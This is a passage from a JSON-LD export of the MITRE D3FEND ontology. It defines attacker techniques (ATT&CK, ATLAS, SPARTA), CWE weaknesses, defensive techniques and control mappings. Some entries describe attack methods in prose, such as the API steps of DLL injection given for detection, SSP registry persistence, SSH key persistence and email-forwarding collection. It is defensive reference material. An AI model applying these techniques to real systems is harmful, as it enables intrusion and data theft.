      "d3f:kb-abstract": "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.\n\nAllocate memory in the target program with VirtualAllocEx\nWrite the name of the DLL to inject into this program with WriteProcessMemory\nCreate a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.\nThis behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-10-002: DLL Injection via Load Library",
      "rdfs:label": "Reference - CAR-2013-10-002: DLL Injection via Load Library - MITRE"
    },
    {
      "@id": "d3f:T1569.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.003",
      "d3f:definition": "Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications.",
      "rdfs:label": "Systemctl",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:FirmwareSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects information on firmware installed on an Endpoint.",
      "d3f:monitors": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Firmware Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:Nfa16c0d7fdfb480aa561ca5277aab0f9"
        }
      ]
    },
    {
      "@id": "_:Nfa16c0d7fdfb480aa561ca5277aab0f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1101",
      "@type": "owl:Class",
      "d3f:attack-id": "T1101",
      "d3f:definition": "Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.005",
      "rdfs:label": "Security Support Provider",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NetworkTrafficCommunityDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficCommunityDeviation"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-NTCD",
      "d3f:definition": "Establishing baseline communities of network hosts and identifying statistically divergent inter-community communication.",
      "d3f:kb-article": "## How it works\nHosts/users within a computer network are analyzed to identify communities of hosts which frequently communicate. Future communications between communities that don't usually communicate can then be detected.  For example, if a community of hosts that communicate in support of a company's finance division suddenly starts to access the code server usually accessed only by engineers, this may indicate unauthorized activity.\n\n## Considerations\n* Potential for false positives in very dynamic network environments.\n* Attackers that move low and slow may not differentiate their behavior enough to trigger an alert.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc"
      },
      "rdfs:label": "Network Traffic Community Deviation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:Nece8e9578a9040178d34edd5e259f693"
        }
      ]
    },
    {
      "@id": "_:Nece8e9578a9040178d34edd5e259f693",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-TrustedAttestationProtocolUseCases",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf"
      },
      "d3f:kb-article": "## Document Abstract\nThis specification defines the Trusted Platform Module (TPM) a device that enables trust in computing platforms in general. It is broken into parts to make the role of each part clear. All parts are required in order to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer.",
      "d3f:kb-reference-title": "Trusted Attestation Protocol Use Cases",
      "rdfs:label": "Reference - Trusted Attestation Protocol Use Cases"
    },
    {
      "@id": "d3f:cwe-kb-annotation",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "cwe-kb-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:CWE-394",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-394",
      "d3f:definition": "The product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product.",
      "rdfs:label": "Unexpected Status Code or Return Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:modifies-part",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modifies-part y: The entity x modifies a part of y.  [Note: This is a rolification property for the rule 'if one modifies a part of a whole, they modify the whole.'  Reasoning for this and similar semantics to come are under evaluation and not part of current d3fend inferences.]",
      "owl:propertyChainAxiom": {
        "@list": [
          {
            "@id": "d3f:modifies"
          },
          {
            "@id": "d3f:contains"
          }
        ]
      },
      "rdfs:label": "modifies-part",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-modify"
      }
    },
    {
      "@id": "d3f:Reference-SMBSessionSetups_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-09-003/"
      },
      "d3f:kb-abstract": "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.\n\nThis analytic monitors SMB activity that deals with user activity rather than file activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:IPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-09-003: SMB Session Setups",
      "rdfs:label": "Reference - CAR-2013-09-003: SMB Session Setups - MITRE"
    },
    {
      "@id": "d3f:T1403",
      "@type": "owl:Class",
      "d3f:attack-id": "T1403",
      "d3f:definition": "ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Cached Executable Code - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Modify Cached Executable Code"
    },
    {
      "@id": "d3f:MouseInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A computer mouse (plural mice or mouses) is a hand-held pointing device that detects two-dimensional motion relative to a surface. This motion is typically translated into the motion of a pointer on a display, which allows a smooth control of the graphical user interface of a computer. In addition to moving a cursor, computer mice have one or more buttons to allow operations such as selection of a menu item on a display. Mice often also feature other elements, such as touch surfaces and scroll wheels, which enable additional control and dimensional input.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_mouse"
      },
      "rdfs:label": "Mouse Input Device",
      "rdfs:seeAlso": {
        "@id": "dbr:Pointing_device"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      },
      "skos:altLabel": "Computer Mouse"
    },
    {
      "@id": "d3f:T1643",
      "@type": "owl:Class",
      "d3f:attack-id": "T1643",
      "d3f:definition": "Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.",
      "rdfs:label": "Generate Traffic from Victim - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Generate Traffic from Victim"
    },
    {
      "@id": "d3f:CCI-001404_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account disabling actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001404"
    },
    {
      "@id": "d3f:CWE-431",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-431",
      "d3f:definition": "A handler is not available or implemented.",
      "rdfs:label": "Missing Handler",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1114.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1114.003",
      "d3f:definition": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Email Forwarding Rule",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N2b26ed2123d143ef99070bbd7eac458f"
        }
      ]
    },
    {
      "@id": "_:N2b26ed2123d143ef99070bbd7eac458f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:IA-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008",
      "d3f:definition": "Adversaries obtain a foothold by interacting with the spacecraft from platforms outside the authorized ground architecture. A “rogue external entity” is any actor-controlled transmitter or node, ground, maritime, airborne, or space-based, that can radiate or exchange traffic using mission-compatible waveforms, framing, or crosslink protocols. The technique exploits the fact that many vehicles must remain commandable and discoverable over wide areas and across multiple modalities. Using public ephemerides, pass predictions, and knowledge of acquisition procedures, the actor times transmissions to line-of-sight windows, handovers, or maintenance periods. Initial access stems from presenting traffic that the spacecraft will parse or prioritize: syntactically valid telecommands, crafted ranging/acquisition exchanges, crosslink service advertisements, or payload/user-channel messages that bridge into the command/data path.",
      "rdfs:label": "Rogue External Entity - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Rogue External Entity"
    },
    {
      "@id": "d3f:T1098.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.004",
      "d3f:definition": "Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.",
      "rdfs:label": "SSH Authorized Keys",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:One-timePassword",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:One-timePassword"
      ],
      "d3f:d3fend-id": "D3-OTP",
      "d3f:definition": "A one-time password is valid for only one user authentication.",
      "d3f:kb-article": "## How it works\n\nWhen a user initiates authentication, they are asked for a one-time password, often in addition to other credentials such as a traditional password or smart card. The one-time password may be from a list provided in advance, sent via a channel such as SMS or HTTPS to an app, or a generated token.\n\nIn the case of a physical token which generates one-time passwords incrementally based on time elapsed, that token device need not be connected to the internet. In different implementations, an administrator of the system, or a user with additional verification, can adjust for clock skew between the token and the verification system as needed.\n\n## Considerations\n\n### Compromise of delivery channel\n- SIM Swapping\n- Secure token visual compromise\n- Insecure delivery channel\n\n### Compromise of delivery device\nPhysical loss of One-time Password device.\n\n### Compromise of long-term backup codes\nThese are often provided in the form of a downloadable document with a regular name, which can be searched for in the case that the user forgets where they put them.  This digital file or printed document could be stolen.\nAdditionally, after the code file is printed, it could be recovered from the system printer spool unless the spooler cache is cleared.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3"
        },
        {
          "@id": "d3f:Reference-RFC2289-AOne-TimePasswordSystem"
        }
      ],
      "d3f:synonym": "OTP",
      "d3f:use-limits": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "One-time Password",
      "rdfs:seeAlso": {
        "@id": "dbr:One-time_password"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PasswordRotation"
        },
        {
          "@id": "_:N89b2af276c19412c8bc79b0dd371f83e"
        }
      ]
    },
    {
      "@id": "_:N89b2af276c19412c8bc79b0dd371f83e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:use-limits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:ATLASCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0009"
      },
      "rdfs:label": "Collection Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N6ee9b73f6844426b953a48cf86a15d8c"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N6ee9b73f6844426b953a48cf86a15d8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0009"
      }
    },
    {
      "@id": "d3f:CWE-243",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-243",
      "d3f:definition": "The product uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.",
      "rdfs:label": "Creation of chroot Jail Without Changing Working Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-669"
        }
      ]
    },
    {
      "@id": "d3f:ConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete event that creates, applies, modifies, or deletes configuration resources to determine or alter the function of a system, device, application, or service.",
      "rdfs:label": "Configuration Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Ne3463f0f287942c5876d14662bf8b05e"
        }
      ]
    },
    {
      "@id": "_:Ne3463f0f287942c5876d14662bf8b05e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Detect",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The detect tactic is used to identify adversary access to or unauthorized activity on computer networks.",
      "d3f:display-order": 1,
      "d3f:display-priority": 0,
      "rdfs:label": "Detect",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-1328",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1328",
      "d3f:definition": "Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.",
      "rdfs:label": "Security Version Number Mutable to Older Versions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:AML.T0052",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0052",
      "d3f:definition": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nGenerative AI, including LLMs that generate synthetic text, visual deepfakes of faces, and audio deepfakes of speech, is enabling adversaries to scale targeted phishing campaigns. LLMs can interact with users via text conversations and can be programmed with a meta prompt to phish for sensitive information. Deepfakes can be use in impersonation as an aid to phishing.",
      "rdfs:label": "Phishing - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0052"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Phishing"
    },
    {
      "@id": "d3f:FileMetadataValueVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMetadataValueVerification"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:FileFooterBlock"
        },
        {
          "@id": "d3f:FileHeaderBlock"
        }
      ],
      "d3f:d3fend-id": "D3-FMVV",
      "d3f:definition": "The process of checking specific static values within a file, such as file signatures or magic numbers, to ensure they match the expected values defined by the file format specification.",
      "d3f:description": "## How it works\n\nFile format specifications often define expected values for specific fields. A common example are file signatures, or magic numbers, which are used to quickly identify files. Another example is within the Compound Document Header of Microsoft Office files, the 29th and 30th byte identifies the byte order, specifically 0xFFFE for little-endian. This technique verifies that the file's static values match the values of the declared file format's specification.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-IntroductoryComputerForensics"
        }
      ],
      "rdfs:label": "File Metadata Value Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:N3ca3b338af8b429da101d1fc5e257a58"
        },
        {
          "@id": "_:Ne72a745530904316aacdce4fc56a9ca3"
        }
      ]
    },
    {
      "@id": "_:N3ca3b338af8b429da101d1fc5e257a58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileFooterBlock"
      }
    },
    {
      "@id": "_:Ne72a745530904316aacdce4fc56a9ca3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileHeaderBlock"
      }
    },
    {
      "@id": "d3f:DivisiveClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DC",
      "d3f:definition": "A divisive clustering approach is a hierarchical, top-down approach to clustering a dataset.",
      "rdfs:label": "Divisive Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:HierarchicalClustering"
      }
    },
    {
      "@id": "d3f:IA-0011",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0011",
      "d3f:definition": "Adversaries abuse peripherals and removable media that the spacecraft (or its support equipment) ingests during development, I&T, or on-orbit operations. Small satellites and hosted payloads frequently expose standard interfaces, USB, UART, Ethernet, SpaceWire, CAN, or mount removable storage for loading ephemerides, tables, configuration bundles, or firmware. A tainted device can masquerade as a trusted class (mass-storage, CDC/HID) or present crafted files that trigger auto-ingest workflows, file watchers, or maintenance utilities. Malware may be staged by modifying the peripheral’s firmware, seeding the images written by lab formatting tools, or swapping media during handling. Once connected, the device can deliver binaries, scripts, or malformed data products that execute under existing procedures. Because these interactions often occur during hurried timelines (checkouts, rehearsals, contingency maintenance), the initial execution blends with legitimate peripheral use while traversing a path already privileged to reach flight software or controllers.",
      "rdfs:label": "Auxiliary Device Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0011/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Auxiliary Device Compromise"
    },
    {
      "@id": "d3f:T1676",
      "@type": "owl:Class",
      "d3f:attack-id": "T1676",
      "d3f:definition": "Adversaries may abuse the “linked devices” feature on messaging applications, such as Signal and WhatsApp, to register the user’s account to an adversary-controlled device. By abusing the “linked devices” feature, adversaries may achieve and maintain persistence through the user’s account, may collect information, such as the user’s messages and contacts list, and may send future messages from the linked device.",
      "rdfs:label": "Linked Devices - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Linked Devices"
    },
    {
      "@id": "d3f:TFTPNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "TFTP Network Traffic is network traffic typically used to automatically transfer configuration or boot files between machines.",
      "rdfs:label": "TFTP Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-385",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-385",
      "d3f:definition": "Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information.",
      "rdfs:label": "Covert Timing Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-514"
      }
    },
    {
      "@id": "d3f:HumanInputDeviceFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on an HCI device such as a mouse or keyboard.",
      "rdfs:label": "Human Input Device Firmware",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "dbr:Human_interface_device"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Privileged Access",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "RA-5(5)"
    },
    {
      "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://www.biometric-solutions.com/keystroke-dynamics.html"
      },
      "d3f:kb-abstract": "Keystroke dynamics or typing dynamics refers to the automated method of identifying or confirming the identity of an individual based on the manner and the rhythm of typing on a keyboard. Keystroke dynamics is a behavioral biometric, this means that the biometric factor is 'something you do'.\n\nAlready during the second world war a technique known as The Fist of the Sender was used by military intelligence to distinguish based on the rhythm whether a morse code message was send by ally or enemy. These days each household has at least one computer keyboard, making keystroke dynamics the easiest biometric solution to implement in terms of hardware.\n\nWith keystroke dynamics the biometric template used to identify an individual is based on the typing pattern, the rhythm and the speed of typing on a keyboard. The raw measurements used for keystroke dynamics are dwell time and flight time.",
      "d3f:kb-author": "Biometric Solutions",
      "d3f:kb-organization": "Biometric Solutions",
      "d3f:kb-reference-of": {
        "@id": "d3f:InputDeviceAnalysis"
      },
      "d3f:kb-reference-title": "Keystroke Dynamics",
      "rdfs:label": "Reference - http://www.biometric-solutions.com/keystroke-dynamics.html - biometric-solutions.com"
    },
    {
      "@id": "d3f:CWE-654",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-654",
      "d3f:definition": "A protection mechanism relies exclusively, or to a large extent, on the evaluation of a single condition or the integrity of a single object or entity in order to make a decision about granting access to restricted resources or functionality.",
      "d3f:synonym": "Separation of Privilege",
      "rdfs:label": "Reliance on a Single Factor in a Security Decision",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:CWE-623",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-623",
      "d3f:definition": "An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.",
      "rdfs:label": "Unsafe ActiveX Control Marked Safe For Scripting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-267"
      }
    },
    {
      "@id": "d3f:d3fend-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-object-property"
    },
    {
      "@id": "d3f:ATTACKICSEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0103"
      },
      "rdfs:label": "Evasion Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Ned80375ac77b46409a147ebcecab78c0"
        }
      ],
      "skos:prefLabel": "Evasion Technique"
    },
    {
      "@id": "_:Ned80375ac77b46409a147ebcecab78c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0103"
      }
    },
    {
      "@id": "d3f:ARIMAModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AM",
      "d3f:definition": "An autoregressive integrated moving average (ARIMA) model is a generalization of an autoregressive moving average (ARMA) model.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive integrated moving average. [Link](https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average)",
      "d3f:synonym": "Autoregressive Integrated Moving Average Model",
      "rdfs:label": "ARIMA Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:M1017",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Modeling user training is  outside the scope of D3FEND.",
      "rdfs:label": "User Training"
    },
    {
      "@id": "d3f:DecoyFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyFile"
      ],
      "d3f:d3fend-id": "D3-DF",
      "d3f:definition": "A file created for the purposes of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nThe decoy file is made available as a local or network resource. Accesses to the file may be monitored. The files may be configurations, documents, executables, or other file types.\n\n\n## Considerations\nProperties of the file such as cryptographic checksums, file creation date, file modified date, file size, file owner etc may be modified to improve the credibility of the file.\n\n## Example\n* A CSV file with decoy user credentials is placed on a system. The system or network is then monitored to detect any accesses to the decoy files.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-OpenSourceIntelligenceDeceptions_IllusiveNetworksLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndAMethodForIdentifyingThePresenceOfMalwareAndRansomwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForPreventingRansomwareFromEncryptingDataElementsStoredInAMemoryOfAComputer-basedSystem_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SupplyChainCyber-deception_Cymmetria,Inc."
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Decoy File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Ne048c668b6d74f4f8a40a4e492029371"
        }
      ]
    },
    {
      "@id": "_:Ne048c668b6d74f4f8a40a4e492029371",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:PhysicalAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who is physically close enough to interact with the system directly, such as through physical access to devices.",
      "rdfs:label": "Physical Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LocalAttacker"
        },
        {
